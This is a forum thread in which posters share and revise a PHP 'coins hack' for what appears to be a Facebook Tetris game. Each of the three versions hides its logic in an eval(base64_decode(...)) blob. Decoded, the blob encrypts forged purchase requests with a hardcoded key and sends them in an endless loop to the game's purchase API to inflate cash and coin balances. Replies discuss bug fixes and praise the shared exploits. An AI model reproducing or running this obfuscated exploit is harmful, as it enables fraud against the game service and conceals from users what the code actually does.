<?php
$fbid = 'YOUR UID HERE';
$ticket='YOUR TICKET HERE';
eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnbWNyeXB0X2dlbmVyaWNfaW5pdCcpKSBkaWUoJ1NvcnJ5IHlvdSBkb25cJ3QgaGF2ZSBtY3J5cHQnKTsNCiRrZXk9J3R5cGVjb25maWcuc3lzXl8tJzsNCg0KJHRpbWU9dGltZSgpOw0KJHRkID0gbWNyeXB0X21vZHVsZV9vcGVuKE1DUllQVF9CTE9XRklTSCwgJycsIE1DUllQVF9NT0RFX0VDQiwgJycpOw0KJGl2ID0gbWNyeXB0X2NyZWF0ZV9pdiAobWNyeXB0X2VuY19nZXRfaXZfc2l6ZSgkdGQpLCBNQ1JZUFRfUkFORCk7DQptY3J5cHRfZ2VuZXJpY19pbml0KCR0ZCwgJGtleSwgJGl2KTsNCg0KDQogICAgICAgIGZ1bmN0aW9uIHBrY3M1X3BhZCgkdGV4dCwgJGJsb2Nrc2l6ZSkNCiAgICAgICAgew0KJHBhZCA9ICRibG9ja3NpemUgLSAoc3RybGVuKCR0ZXh0KSAlICRibG9ja3NpemUpOw0KcmV0dXJuICR0ZXh0IC4gc3RyX3JlcGVhdChjaHIoJHBhZCksICRwYWQpOw0KfQ0KJHNpemUgPSBtY3J5cHRfZ2V0X2Jsb2NrX3NpemUoTUNSWVBUX0JMT1dGSVNILCBNQ1JZUFRfTU9ERV9FQ0IpOw0KJGk9MDsNCndoaWxlKDEpIHsNCiRpKys7DQokcF90ID0gdXRmOF9lbmNvZGUoJ3sidXBkYXRlTGFzdERhdGUiOjEsInRpY2tldCI6IicuJHRpY2tldC4nIiwidHJpZCI6Jy5yYW5kKDQwMDAsNzAwMCkuJywiZmJ1aWQiOiInLiRmYmlkLiciLCJ0aW1lc3RhbXAiOicuKHRpbWUoKSsxMDAwMCskaSpyYW5kKDAsNzAwMDAwMDAwMDApKS4nLCJjdXJyZW5jeVR5cGUiOiIyIiwiY3VycmVuY3lWYWx1ZSI6IjEiLCJwbGF0Zm9ybSI6ImZiIn0nKTsNCiRyZXBseTEgPSBiYXNlNjRfZW5jb2RlKG1jcnlwdF9nZW5lcmljKCR0ZCwgcGtjczVfcGFkKCRwX3QsICRzaXplKSkpOw0KJHJlcCA9IGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vdGJjLnRldHJpc2ZiLmNvbS9hcGkvcHVyY2hhc2U/bGVuZ3RoPScuc3RybGVuKCRwX3QpLicmZWpzb249Jy4kcmVwbHkxKTsNCiRqc29uID0ganNvbl9kZWNvZGUoJHJlcCk7DQppZihpc3NldCgkanNvbi0+bWVzc2FnZSkpIGRpZSgkanNvbi0+bWVzc2FnZS4iXG4iKTsNCmlmKCEkcmVwKSBkaWUgKCdFcnJvciBuZXR3b3JrJy4iXG4iKTsNCiRqc29uX3N0cmluZyA9IHRyaW0obWRlY3J5cHRfZ2VuZXJpYygkdGQsIGJhc2U2NF9kZWNvZGUoJHJlcCkpKTsNCnByZWdfbWF0Y2goJyNjYXNoQ3VycmVudCI6KFswLTldKykjJywgJGpzb25fc3RyaW5nLCAkbWF0Y2hlcyk7DQppZighaXNzZXQoJG1hdGNoZXNbMV0pKSBkaWUgKCdEZWNvZGUgZXJyb3InKTsNCmVjaG8gJ1lvdSBoYXZlICcuJG1hdGNoZXNbMV0uJyBjYXNoJy4iXG4iOw0KJGkrKzsNCiRwX3QgPSB1dGY4X2VuY29kZSgneyJ1cGRhdGVMYXN0RGF0ZSI6MSwidGlja2V0IjoiJy4kdGlja2V0LiciLCJ0cmlkIjonLnJhbmQoNDAwMCw3MDAwKS4nLCJmYnVpZCI6IicuJGZiaWQuJyIsInRpbWVzdGFtcCI6Jy4odGltZSgpKzEwMDAwKyRpKnJhbmQoMCw3MDAwMDAwMDAwKSkuJywiY3VycmVuY3lUeXBlIjoiMSIsImN1cnJlbmN5VmFsdWUiOiIxMDAiLCJwbGF0Zm9ybSI6ImZiIn0nKTsNCiRyZXBseTEgPSBiYXNlNjRfZW5jb2RlKG1jcnlwdF9nZW5lcmljKCR0ZCwgcGtjczVfcGFkKCRwX3QsICRzaXplKSkpOw0KJHJlcCA9IGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vdGJjLnRldHJpc2ZiLmNvbS9hcGkvcHVyY2hhc2U/bGVuZ3RoPScuc3RybGVuKCRwX3QpLicmZWpzb249Jy4kcmVwbHkxKTsNCiRqc29uID0ganNvbl9kZWNvZGUoJHJlcCk7DQppZihpc3NldCgkanNvbi0+bWVzc2FnZSkpIGRpZSgkanNvbi0+bWVzc2FnZS4iXG4iKTsNCmlmKCEkcmVwKSBkaWUgKCdFcnJvciBuZXR3b3JrJy4iXG4iKTsNCiRqc29uX3N0cmluZyA9IHRyaW0obWRlY3J5cHRfZ2VuZXJpYygkdGQsIGJhc2U2NF9kZWNvZGUoJHJlcCkpKTsNCnByZWdfbWF0Y2goJyNjb2luc0N1cnJlbnQiOihbMC05XSspIycsICRqc29uX3N0cmluZywgJG1hdGNoZXMpOw0KaWYoIWlzc2V0KCRtYXRjaGVzWzFdKSkgZGllICgnRGVjb2RlIGVycm9yJyk7DQplY2hvICdZb3UgaGF2ZSAnLiRtYXRjaGVzWzFdLicgY29pbnMnLiJcbiI7DQovL3NsZWVwKDEpOw0KfQ=='));
?>
Updated, fixed coinsQuote:
purchase failure timestamp has expired after getting one cash
finally it worked :pimp:
<?php
$fbid = 'YOUR UID HERE';
$ticket='YOUR TICKET HERE';
eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnbWNyeXB0X2dlbmVyaWNfaW5pdCcpKSBkaWUoJ1NvcnJ5IHlvdSBkb25cJ3QgaGF2ZSBtY3J5cHQnKTsKJGtleT0ndHlwZWNvbmZpZy5zeXNeXy0nOwoKJHRpbWU9dGltZSgpOwokdGQgPSBtY3J5cHRfbW9kdWxlX29wZW4oTUNSWVBUX0JMT1dGSVNILCAnJywgTUNSWVBUX01PREVfRUNCLCAnJyk7CiRpdiA9IG1jcnlwdF9jcmVhdGVfaXYgKG1jcnlwdF9lbmNfZ2V0X2l2X3NpemUoJHRkKSwgTUNSWVBUX1JBTkQpOwptY3J5cHRfZ2VuZXJpY19pbml0KCR0ZCwgJGtleSwgJGl2KTsKCgogICAgICAgIGZ1bmN0aW9uIHBrY3M1X3BhZCgkdGV4dCwgJGJsb2Nrc2l6ZSkKICAgICAgICB7CiRwYWQgPSAkYmxvY2tzaXplIC0gKHN0cmxlbigkdGV4dCkgJSAkYmxvY2tzaXplKTsKcmV0dXJuICR0ZXh0IC4gc3RyX3JlcGVhdChjaHIoJHBhZCksICRwYWQpOwp9CiRzaXplID0gbWNyeXB0X2dldF9ibG9ja19zaXplKE1DUllQVF9CTE9XRklTSCwgTUNSWVBUX01PREVfRUNCKTsKJGk9MDsKd2hpbGUoMSkgewokaSsrOwokcF90ID0gdXRmOF9lbmNvZGUoJ3sidXBkYXRlTGFzdERhdGUiOjEsInRpY2tldCI6IicuJHRpY2tldC4nIiwidHJpZCI6Jy5yYW5kKDQwMDAsNzAwMCkuJywiZmJ1aWQiOiInLiRmYmlkLiciLCJ0aW1lc3RhbXAiOicuKHRpbWUoKSsxMDAwMCskaSpyYW5kKDAsNzAwMDAwMDAwMDApKS4nLCJjdXJyZW5jeVR5cGUiOiIyIiwiY3VycmVuY3lWYWx1ZSI6IjEiLCJwbGF0Zm9ybSI6ImZiIn0nKTsKJHJlcGx5MSA9IGJhc2U2NF9lbmNvZGUobWNyeXB0X2dlbmVyaWMoJHRkLCBwa2NzNV9wYWQoJHBfdCwgJHNpemUpKSk7CiRyZXAgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3RiYy50ZXRyaXNmYi5jb20vYXBpL3B1cmNoYXNlP2xlbmd0aD0nLnN0cmxlbigkcF90KS4nJmVqc29uPScuJHJlcGx5MSk7CiRqc29uID0ganNvbl9kZWNvZGUoJHJlcCk7CmlmKGlzc2V0KCRqc29uLT5tZXNzYWdlKSkgZGllKCRqc29uLT5tZXNzYWdlLiJcbiIpOwppZighJHJlcCkgZGllICgnRXJyb3IgbmV0d29yaycuIlxuIik7CiRqc29uX3N0cmluZyA9IHRyaW0obWRlY3J5cHRfZ2VuZXJpYygkdGQsIGJhc2U2NF9kZWNvZGUoJHJlcCkpKTsKcHJlZ19tYXRjaCgnI2Nhc2hDdXJyZW50IjooWzAtOV0rKSMnLCAkanNvbl9zdHJpbmcsICRtYXRjaGVzKTsKZWNobyAnWW91IGhhdmUgJy4kbWF0Y2hlc1sxXS4nIGNhc2gnLiJcbiI7CiRpKys7CiRwX3QgPSB1dGY4X2VuY29kZSgneyJ1cGRhdGVMYXN0RGF0ZSI6MSwidGlja2V0IjoiJy4kdGlja2V0LiciLCJ0cmlkIjonLnJhbmQoNDAwMCw3MDAwKS4nLCJmYnVpZCI6IicuJGZiaWQuJyIsInRpbWVzdGFtcCI6Jy4odGltZSgpKzEwMDAwKyRpKnJhbmQoMCw3MDAwMDAwMDAwMCkpLicsImN1cnJlbmN5VHlwZSI6IjEiLCJjdXJyZW5jeVZhbHVlIjoiMTAwIiwicGxhdGZvcm0iOiJmYiJ9Jyk7CiRyZXBseTEgPSBiYXNlNjRfZW5jb2RlKG1jcnlwdF9nZW5lcmljKCR0ZCwgcGtjczVfcGFkKCRwX3QsICRzaXplKSkpOwokcmVwID0gZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly90YmMudGV0cmlzZmIuY29tL2FwaS9wdXJjaGFzZT9sZW5ndGg9Jy5zdHJsZW4oJHBfdCkuJyZlanNvbj0nLiRyZXBseTEpOwokanNvbiA9IGpzb25fZGVjb2RlKCRyZXApOwppZihpc3NldCgkanNvbi0+bWVzc2FnZSkpIGRpZSgkanNvbi0+bWVzc2FnZS4iXG4iKTsKaWYoISRyZXApIGRpZSAoJ0Vycm9yIG5ldHdvcmsnLiJcbiIpOwokanNvbl9zdHJpbmcgPSB0cmltKG1kZWNyeXB0X2dlbmVyaWMoJHRkLCBiYXNlNjRfZGVjb2RlKCRyZXApKSk7CnByZWdfbWF0Y2goJyNjb2luc0N1cnJlbnQiOihbMC05XSspIycsICRqc29uX3N0cmluZywgJG1hdGNoZXMpOwppZighaXNzZXQoJG1hdGNoZXNbMV0pKSBkaWUgKCdEZWNvZGUgZXJyb3InKTsKZWNobyAnWW91IGhhdmUgJy4kbWF0Y2hlc1sxXS4nIGNvaW5zJy4iXG4iOwovL3NsZWVwKDEpOwp9'));
?>
Yes at the 1st I don't try to understand :D no I search the hidden char and fond PKCS the hidden chars do many bugs in PHP but we can't see it with var_dump we need to convert to hex, now It's clean exploitQuote:
Updated, fixed coins
Edit3 : fixed coins hack timestamp errorCode:<?php $fbid = 'YOUR UID HERE'; $ticket='YOUR TICKET HERE'; eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnbWNyeXB0X2dlbmVyaWNfaW5pdCcpKSBkaWUoJ1NvcnJ5IHlvdSBkb25cJ3QgaGF2ZSBtY3J5cHQnKTsKJGtleT0ndHlwZWNvbmZpZy5zeXNeXy0nOwoKJHRpbWU9dGltZSgpOwokdGQgPSBtY3J5cHRfbW9kdWxlX29wZW4oTUNSWVBUX0JMT1dGSVNILCAnJywgTUNSWVBUX01PREVfRUNCLCAnJyk7CiRpdiA9IG1jcnlwdF9jcmVhdGVfaXYgKG1jcnlwdF9lbmNfZ2V0X2l2X3NpemUoJHRkKSwgTUNSWVBUX1JBTkQpOwptY3J5cHRfZ2VuZXJpY19pbml0KCR0ZCwgJGtleSwgJGl2KTsKCgogICAgICAgIGZ1bmN0aW9uIHBrY3M1X3BhZCgkdGV4dCwgJGJsb2Nrc2l6ZSkKICAgICAgICB7CiRwYWQgPSAkYmxvY2tzaXplIC0gKHN0cmxlbigkdGV4dCkgJSAkYmxvY2tzaXplKTsKcmV0dXJuICR0ZXh0IC4gc3RyX3JlcGVhdChjaHIoJHBhZCksICRwYWQpOwp9CiRzaXplID0gbWNyeXB0X2dldF9ibG9ja19zaXplKE1DUllQVF9CTE9XRklTSCwgTUNSWVBUX01PREVfRUNCKTsKJGk9MDsKd2hpbGUoMSkgewokaSsrOwokcF90ID0gdXRmOF9lbmNvZGUoJ3sidXBkYXRlTGFzdERhdGUiOjEsInRpY2tldCI6IicuJHRpY2tldC4nIiwidHJpZCI6Jy5yYW5kKDQwMDAsNzAwMCkuJywiZmJ1aWQiOiInLiRmYmlkLiciLCJ0aW1lc3RhbXAiOicuKHRpbWUoKSsxMDAwMCskaSpyYW5kKDAsNzAwMDAwMDAwMDApKS4nLCJjdXJyZW5jeVR5cGUiOiIyIiwiY3VycmVuY3lWYWx1ZSI6IjEiLCJwbGF0Zm9ybSI6ImZiIn0nKTsKJHJlcGx5MSA9IGJhc2U2NF9lbmNvZGUobWNyeXB0X2dlbmVyaWMoJHRkLCBwa2NzNV9wYWQoJHBfdCwgJHNpemUpKSk7CiRyZXAgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3RiYy50ZXRyaXNmYi5jb20vYXBpL3B1cmNoYXNlP2xlbmd0aD0nLnN0cmxlbigkcF90KS4nJmVqc29uPScuJHJlcGx5MSk7CiRqc29uID0ganNvbl9kZWNvZGUoJHJlcCk7CmlmKGlzc2V0KCRqc29uLT5tZXNzYWdlKSkgZGllKCRqc29uLT5tZXNzYWdlLiJcbiIpOwppZighJHJlcCkgZGllICgnRXJyb3IgbmV0d29yaycuIlxuIik7CiRqc29uX3N0cmluZyA9IHRyaW0obWRlY3J5cHRfZ2VuZXJpYygkdGQsIGJhc2U2NF9kZWNvZGUoJHJlcCkpKTsKcHJlZ19tYXRjaCgnI2Nhc2hDdXJyZW50IjooWzAtOV0rKSMnLCAkanNvbl9zdHJpbmcsICRtYXRjaGVzKTsKZWNobyAnWW91IGhhdmUgJy4kbWF0Y2hlc1sxXS4nIGNhc2gnLiJcbiI7CiRpKys7CiRwX3QgPSB1dGY4X2VuY29kZSgneyJ1cGRhdGVMYXN0RGF0ZSI6MSwidGlja2V0IjoiJy4kdGlja2V0LiciLCJ0cmlkIjonLnJhbmQoNDAwMCw3MDAwKS4nLCJmYnVpZCI6IicuJGZiaWQuJyIsInRpbWVzdGFtcCI6Jy4odGltZSgpKzEwMDAwKyRpKnJhbmQoMCw3MDAwMDAwMDAwMCkpLicsImN1cnJlbmN5VHlwZSI6IjEiLCJjdXJyZW5jeVZhbHVlIjoiMTAwIiwicGxhdGZvcm0iOiJmYiJ9Jyk7CiRyZXBseTEgPSBiYXNlNjRfZW5jb2RlKG1jcnlwdF9nZW5lcmljKCR0ZCwgcGtjczVfcGFkKCRwX3QsICRzaXplKSkpOwokcmVwID0gZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly90YmMudGV0cmlzZmIuY29tL2FwaS9wdXJjaGFzZT9sZW5ndGg9Jy5zdHJsZW4oJHBfdCkuJyZlanNvbj0nLiRyZXBseTEpOwokanNvbiA9IGpzb25fZGVjb2RlKCRyZXApOwppZihpc3NldCgkanNvbi0+bWVzc2FnZSkpIGRpZSgkanNvbi0+bWVzc2FnZS4iXG4iKTsKaWYoISRyZXApIGRpZSAoJ0Vycm9yIG5ldHdvcmsnLiJcbiIpOwokanNvbl9zdHJpbmcgPSB0cmltKG1kZWNyeXB0X2dlbmVyaWMoJHRkLCBiYXNlNjRfZGVjb2RlKCRyZXApKSk7CnByZWdfbWF0Y2goJyNjb2luc0N1cnJlbnQiOihbMC05XSspIycsICRqc29uX3N0cmluZywgJG1hdGNoZXMpOwppZighaXNzZXQoJG1hdGNoZXNbMV0pKSBkaWUgKCdEZWNvZGUgZXJyb3InKTsKZWNobyAnWW91IGhhdmUgJy4kbWF0Y2hlc1sxXS4nIGNvaW5zJy4iXG4iOwovL3NsZWVwKDEpOwp9')); ?>
credits to benoit934
good job sharing your php exploits :)